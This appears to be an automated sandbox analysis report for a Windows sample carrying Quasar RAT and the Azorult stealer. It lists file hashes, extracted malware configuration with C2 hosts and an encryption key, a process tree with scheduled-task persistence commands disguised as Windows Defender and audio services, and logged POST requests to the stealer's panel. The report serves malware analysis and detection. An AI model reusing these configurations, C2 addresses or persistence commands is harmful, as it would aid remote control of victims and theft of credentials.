Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
4s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
-
submitted
27/06/2024, 09:20 UTC
General
-
Target
7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe
-
Size
2.0MB
-
MD5
efebb862c00bc54b222906c378b7d630
-
SHA1
220384eed32be0063bf476c584e3eb6891a414c9
-
SHA256
7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3
-
SHA512
192c53da7ff4beb7aa0f6d73d4ff45c1c746351c432186c1bd8d7da60eecb4a927c581f355897ce154f21ea3e1c9fefb798a05ddf41ab669baa51d50da1bfea4
-
SSDEEP
24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYh:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9YP
Malware Config
Extracted
quasar
1.3.0.0
EbayProfiles
5.8.88.191:443
sockartek.icu:443
QSR_MUTEX_0kBRNrRz5TDLEQouI0
-
encryption_key
MWhG6wsClMX8aJM2CVXT
-
install_name
winsock.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
win defender run
-
subdirectory
SubDir
Extracted
azorult
http://0x21.in:8000/_az/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 5 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 8 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k3⤵
- Maps connected drives based on registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\h5rHJG1t3Khn.bat" "4⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"5⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1780 -s 15204⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\7346c3410e979ccebdc7e4f05ccb6b5690949e46e79aa0085060e4ecdb296de3_NeikiAnalytics.exe"2⤵
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {95F856C4-AE5F-4D73-BE9E-3B045EFF3127} S-1-5-21-39690363-730359138-1046745555-1000:EILATWEW\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\btpanui\SystemPropertiesPerformance.exeC:\Users\Admin\btpanui\SystemPropertiesPerformance.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\vnc.exe"C:\Users\Admin\AppData\Local\Temp\vnc.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k4⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"3⤵
-
-
C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F3⤵
- Scheduled Task/Job: Scheduled Task
-
-
Network
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105 -
POSThttp://0x21.in:8000/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 99
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Jun 2024 09:20:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=5272f1758c1a44984c867c6e2bf3c1de|191.101.209.39|1719480020|1719480020|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 99
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Jun 2024 09:20:20 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=eb20799ff5a9f3f424ac7f5002a57e51|191.101.209.39|1719480020|1719480020|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
DNSip-api.comRemote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
GEThttp://ip-api.com/json/Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 27 Jun 2024 09:20:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 52
X-Rl: 42
-
GEThttp://ip-api.com/json/Remote address:208.95.112.1:80RequestGET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 27 Jun 2024 09:20:24 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 51
X-Rl: 41
-
DNSsockartek.icuRemote address:8.8.8.8:53Requestsockartek.icuIN AResponse
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in:8000/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 99
Cache-Control: no-cache
Cookie: btst=5272f1758c1a44984c867c6e2bf3c1de|191.101.209.39|1719480020|1719480020|0|1|0; snkz=191.101.209.39
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Jun 2024 09:21:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=5272f1758c1a44984c867c6e2bf3c1de|191.101.209.39|1719480067|1719480020|23|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
-
DNS0x21.inRemote address:8.8.8.8:53Request0x21.inIN AResponse0x21.inIN A44.221.84.105
-
POSThttp://0x21.in/_az/Remote address:44.221.84.105:8000RequestPOST /_az/ HTTP/1.0
Host: 0x21.in
Connection: close
User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length: 99
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Thu, 27 Jun 2024 09:21:08 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=185150818deb5b364d66796c16e23b9e|191.101.209.39|1719480068|1719480068|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
5.8.88.191:8080 -
44.221.84.105:8000http://0x21.in:8000/_az/http
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
44.221.84.105:8000http://0x21.in/_az/http
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
208.95.112.1:80http://ip-api.com/json/http
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
208.95.112.1:80http://ip-api.com/json/http
HTTP Request
GET http://ip-api.com/json/HTTP Response
200 -
5.8.88.191:443
-
5.8.88.191:8080
-
5.8.88.191:8080
-
44.221.84.105:8000http://0x21.in:8000/_az/http
HTTP Request
POST http://0x21.in:8000/_az/HTTP Response
200 -
44.221.84.105:8000http://0x21.in/_az/http
HTTP Request
POST http://0x21.in/_az/HTTP Response
200 -
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
5.8.88.191:8080
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:53ip-api.comdns
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
8.8.8.8:53sockartek.icudns
DNS Request
sockartek.icu
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
-
8.8.8.8:530x21.indns
DNS Request
0x21.in
DNS Response
44.221.84.105
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
208B
MD52dbc9f43e9a5891a75670b976cda992b
SHA18c9824d30fd46272074dffeccd92fc7bf1e22bc8
SHA256a4f09591c49f9d2dea0d23e140f345623806a3882668ff7a508177017e0b10f2
SHA512bab37f661e93528e83c0f4d9fcc5741151beeb76be6726e36b6e668a5641b5c247d2c14e062b0ff0d92d48d8eaf95904275f4b92fa51f4117e246a8a946db927
-
Filesize
349KB
MD5b4a202e03d4135484d0e730173abcc72
SHA101b30014545ea526c15a60931d676f9392ea0c70
SHA2567050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
SHA512632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb
-
Filesize
211B
MD58c49e1714049dba4f569725e3fab779c
SHA1f8f14c034af58bc7ddc80a522fdc062085ad0e76
SHA2565cbf96c898d98fc1c736d7ef278e97929bb894ab9783ed277743a17d553fc979
SHA512ef40cd95074e5fb5e7c2abc5e4eae3a226ad0f3822964f5173aa21c9e6211136a902baab3b778b6bec47626bbda4fad60cb46f1aecc0c8f901c5108ce10c68b1
-
Filesize
2.0MB
MD522c3fbc0412a29cf17ac5ef9a06194cb
SHA1d815ac3630126e2b6f56af654d7a0dac48d727d3
SHA256b433de81c986b8f404b77e29e97e8b18a05881a3bd8788831b5539ae87f9fe94
SHA512469e7abbce48536d4366ad1bb27df07096cd62f2f150f129fe5181267550376cfb2bbc2222f40c3f243242d717b629dae330487edfd7cfc1e14a183948159bf7
-
Filesize
405KB
MD5b8ba87ee4c3fc085a2fed0d839aadce1
SHA1b3a2e3256406330e8b1779199bb2b9865122d766
SHA2564e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
SHA5127a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
376KB
-
Filesize
376KB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
624KB
-
Filesize
624KB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
376KB
-
Filesize
4KB